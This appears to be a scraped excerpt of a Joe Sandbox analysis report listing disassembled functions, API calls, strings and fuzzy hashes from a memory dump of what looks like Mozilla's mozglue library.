Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: be9acec243ea5c64634913639cefa0e231774da17e7e081a975f1b29be30cee1
Instruction ID: da682e2ffb1bbcde66aff170ec9c03b663158b0436a4d2dd95277e08c591a840
Opcode Fuzzy Hash: be9acec243ea5c64634913639cefa0e231774da17e7e081a975f1b29be30cee1
Instruction Fuzzy Hash: FD21C4B1A042199FDB00CF69D88569A77F8EF84308F044039E91997341EB309A598F92

Function 6CCF76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6CCF76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6CCF7705

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CCF7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CCF778F,00000000,00000000,00000000,00000000), ref: 6CCF7731
free.MOZGLUE(00000000), ref: 6CCF7760

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: dc9cfd6ef5d593a04de8f8f9e484a565289aba8f8422e8291152124e8a4bfa5d
Instruction ID: c6689ff31503492bd00761589912809e326ef8a18a51f2bdec4203ff3194b8d5
Opcode Fuzzy Hash: dc9cfd6ef5d593a04de8f8f9e484a565289aba8f8422e8291152124e8a4bfa5d
Instruction Fuzzy Hash: 8C11C4B1D01215ABE710AFBA8C44BABBEE8EF45354F04442AF848E7700F771985087E2

Function 6CCD0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC93DEF), ref: 6CCD0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC93DEF), ref: 6CCD0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC93DEF), ref: 6CCD0DAF

Strings

<jemalloc>, xrefs: 6CCD0D92, 6CCD0DB9
: (malloc) Error in VirtualFree(), xrefs: 6CCD0D97, 6CCD0DBE

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 5f0e26b081e1c8bfbeefb324cdf7015f233f51488ac9a3dbe0b27d8fc7c105fd
Instruction ID: 6fc43ed9930614738910f68480e23830fa08de563bb13d886f63e5e881950027
Opcode Fuzzy Hash: 5f0e26b081e1c8bfbeefb324cdf7015f233f51488ac9a3dbe0b27d8fc7c105fd
Instruction Fuzzy Hash: D6F0B46139429436E624166E2C0AB5A669D77C2B25F218067F704DEEC0FB50F801C6A8

Function 6CCBD47B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

EnterCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD4F2
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD50B

Part of subcall function 6CC9CFE0: EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC9CFF6
Part of subcall function 6CC9CFE0: LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC9D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD52E
EnterCriticalSection.KERNEL32(6CD1E7DC), ref: 6CCBD690
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD751

Strings

MOZ_CRASH(), xrefs: 6CCBD4BB

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 094b0cd1a2256d23f94680ce3c4691dde5d2163402d92ada281e257c3a85f2ac
Instruction ID: 6b808f0484d0a6c5b623736ec9a0cd961d279703b29d63a0abb6db76d250444c
Opcode Fuzzy Hash: 094b0cd1a2256d23f94680ce3c4691dde5d2163402d92ada281e257c3a85f2ac
Instruction Fuzzy Hash: CC51E3B1A087018FE314CF68C09475AB7F5EB89314F144A2ED59AD7F89E770E844CB82

Function 6CCE46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CCE4721

Part of subcall function 6CC94410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CCD3EBD,00000017,?,00000000,?,6CCD3EBD,?,?,6CC942D2), ref: 6CC94444

Strings

profiler-paused, xrefs: 6CCE46E4
-%llu, xrefs: 6CCE4733
., xrefs: 6CCE476A

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 9bfd7a0c7a757586b09a09c0341549ba55b79fe828ae9e14e591f51530849908
Instruction ID: cf1da77913cfb51154edbcac222f1433a38c6a1851b6e3084265957e0dbeeaa9
Opcode Fuzzy Hash: 9bfd7a0c7a757586b09a09c0341549ba55b79fe828ae9e14e591f51530849908
Instruction Fuzzy Hash: 60312671F042084BCB08CFADD89169EBBE6AB8D314F15813EE8059BB41FB749804CB90

Function 6CCEB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC94290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CCD3EBD,6CCD3EBD,00000000), ref: 6CC942A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CCEB127), ref: 6CCEB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCEB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CCEB4E4

Strings

pid:, xrefs: 6CCEB4DE

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 39c6995542591007fe22b966f86a659de9c4677aebd1877d8597864a4df48599
Instruction ID: 5ab937477ea99e842c795b137a73200bf73e7cce7ad72973d6b2b22c5c1456ec
Opcode Fuzzy Hash: 39c6995542591007fe22b966f86a659de9c4677aebd1877d8597864a4df48599
Instruction Fuzzy Hash: A831F231A013089FDB01DFA9D890ABEB7B5BF4A318F540529E91167E41E731A849CBA1

Function 6CCDE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCDE577
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDE584
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CCDE8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CCDE826, 6CCDE850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CCDE722, 6CCDE750, 6CCDE7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CCDE655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CCDE777
MOZ_PROFILER_STARTUP, xrefs: 6CCDE5A1, 6CCDE5CC, 6CCDE5FF, 6CCDE62A

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 23465b8815e11430b2eb52205649ede240b6626ff3645cf2fac4ff5b9610ba4b
Instruction ID: 75cf09bd40d663341864ef88f77632242ffd6e5098b6b36ceeb9d71416f13484
Opcode Fuzzy Hash: 23465b8815e11430b2eb52205649ede240b6626ff3645cf2fac4ff5b9610ba4b
Instruction Fuzzy Hash: B7118E31608354DFEB009F19C84AA59BBB8FB89368F41051DFA4647F50D774A846CB95

Function 6CCE0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCE0CD5

Part of subcall function 6CCCF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCCF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCE0D40
free.MOZGLUE ref: 6CCE0DCB

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

free.MOZGLUE ref: 6CCE0DDD
free.MOZGLUE ref: 6CCE0DF2

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 743b1c7de14ea3fdd266df0cd72dc9f18f69f911e13676c1c87ef0d02f5db7c2
Instruction ID: f735ba4eb8e7ed1d27d68042bba47296e9f4e9a5d190b5c61b40300628a711f7
Opcode Fuzzy Hash: 743b1c7de14ea3fdd266df0cd72dc9f18f69f911e13676c1c87ef0d02f5db7c2
Instruction Fuzzy Hash: F1412971A187808BD720CF29C08179EFBE5BFC9754F518A2EE8D887750EB70A545CB92

Function 6CCB5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6CCB5D40
EnterCriticalSection.KERNEL32(6CD1F688), ref: 6CCB5D67
__aulldiv.LIBCMT ref: 6CCB5DB4
LeaveCriticalSection.KERNEL32(6CD1F688), ref: 6CCB5DED

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 32650f4b037df722067a4d27a231d07828c72c3caa50cff45bfe4c5573d6b745
Instruction ID: 74a672f360cd66c61fc92143619656b62af2c4d7ae9ff7014affa7c47c238677
Opcode Fuzzy Hash: 32650f4b037df722067a4d27a231d07828c72c3caa50cff45bfe4c5573d6b745
Instruction Fuzzy Hash: F451B071F002298FDF08CFA8C955AAEBBB6FB89304F19865DC911B7B50D7316946CB80

Function 6CC9CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC9CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC9CF4E

Strings

0, xrefs: 6CC9CF30

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 8109f4f632025c56aa6bff12cb7e486ec520c229a7eb93f3c96e3651442aba65
Instruction ID: 9e985ee8d81275a4ab587febf1a2b7aa085c08e1c9037b09418848bf15162159
Opcode Fuzzy Hash: 8109f4f632025c56aa6bff12cb7e486ec520c229a7eb93f3c96e3651442aba65
Instruction Fuzzy Hash: B3510175A002568FCB00CF18C890AAABBB5FF99300F19859DD85A5F752E731ED06CBE0

Function 6CCD6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CCD82BC,?,?), ref: 6CCD649B

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCD64A9

Part of subcall function 6CCCFA80: GetCurrentThreadId.KERNEL32 ref: 6CCCFA8D
Part of subcall function 6CCCFA80: AcquireSRWLockExclusive.KERNEL32(6CD1F448), ref: 6CCCFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCD653F
free.MOZGLUE(?), ref: 6CCD655A

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: c0b7f305f6589469ab18739722bfd969dffe9e245508067db3daebf69e8b9b8a
Instruction ID: 30bce6ceb19c44bb1662f57c628f98389d0c73a061f5fb6783bf8c574f3506d5
Opcode Fuzzy Hash: c0b7f305f6589469ab18739722bfd969dffe9e245508067db3daebf69e8b9b8a
Instruction Fuzzy Hash: C63170B5A047059FD704CF24D884A9BBBE4FF89314F00882EE95A97741EB34F919CB92

Function 6CCAB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCAB4F5
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCAB502
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCAB542
free.MOZGLUE(?), ref: 6CCAB578

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: ff8936962e67ff00317a845d401d9e62a0c9559e478d2680e0d822d286d8fb69
Instruction ID: 33832ce096f7b5b12aa78b9f4e8631231251cf70cf484e95ca48a286af2936c1
Opcode Fuzzy Hash: ff8936962e67ff00317a845d401d9e62a0c9559e478d2680e0d822d286d8fb69
Instruction Fuzzy Hash: B911C030904B4AC7E3128FAAD418761B3B5FF96318F10570AE94953E01FBB0B1C68790

Function 6CCD3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC9F20E,?), ref: 6CCD3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC9F20E,00000000,?), ref: 6CCD3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCD3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CCD3E0E

Part of subcall function 6CCCCC00: GetCurrentProcess.KERNEL32(?,?,6CC931A7), ref: 6CCCCC0D
Part of subcall function 6CCCCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC931A7), ref: 6CCCCC16

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 0daee1bfd92aa0d5a63a9a63eafc11ddf5dc61037ee1cf7e7a04d9aa8fae6017
Instruction ID: 576b4739f14d2498563c5875efecfdf67b127f4660b1cc07ebf374532bfa75dd
Opcode Fuzzy Hash: 0daee1bfd92aa0d5a63a9a63eafc11ddf5dc61037ee1cf7e7a04d9aa8fae6017
Instruction Fuzzy Hash: 2CF012B1A002087FE700AB54DC42DAB376DDB86624F050020FE0857B41E635BD2686F7

Function 6CCE85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CCE85D3

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CCE8725

Strings

map/set<T> too long, xrefs: 6CCE8720

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 8bb358f0421490ac932f3ad9fdfcea6acbf88a3c6954a5351cdafce8661e6149
Instruction ID: c70dfa46445ef996e2d7848785cbdf57227cc912709802a6f88d891282293430
Opcode Fuzzy Hash: 8bb358f0421490ac932f3ad9fdfcea6acbf88a3c6954a5351cdafce8661e6149
Instruction Fuzzy Hash: 8D5153B4A04641CFD701CF19C184A5ABBF1BF8A318F18C29AD8595BB62D375E885CF92

Function 6CC9BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC9BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC9BE8F

Strings

0, xrefs: 6CC9BE5B

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 02162acd8991c6a914586d95dc31c44eb9b5ecd88c44bc56065f95bfd9f9f01b
Instruction ID: 8065d0992f188f0df48b455bdb4611833c281f2ca02820ce74ea20121dcf4339
Opcode Fuzzy Hash: 02162acd8991c6a914586d95dc31c44eb9b5ecd88c44bc56065f95bfd9f9f01b
Instruction Fuzzy Hash: 9641E372909745DFC311CF79C491A9BB7F8BF8A348F004A5DF98497621E730D9598B82

Function 6CCD3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCD3D19
mozalloc_abort.MOZGLUE(?), ref: 6CCD3D6C

Strings

d, xrefs: 6CCD3D58

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 7c374cbde72093f348da42e394457a21cb6c519f190262fde52f8062ffa4d6a2
Instruction ID: 8bc9d6bee4e78f612d1557c7dc6c84014a94800194de2b62d80eadc85365e651
Opcode Fuzzy Hash: 7c374cbde72093f348da42e394457a21cb6c519f190262fde52f8062ffa4d6a2
Instruction Fuzzy Hash: 9D113835F14648D7EB009F6DC8144EEB379EF86304B49825DDE4557A02FB30A584C750

Function 6CCF6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CCF6E22
__Init_thread_footer.LIBCMT ref: 6CCF6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CCF6E1D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

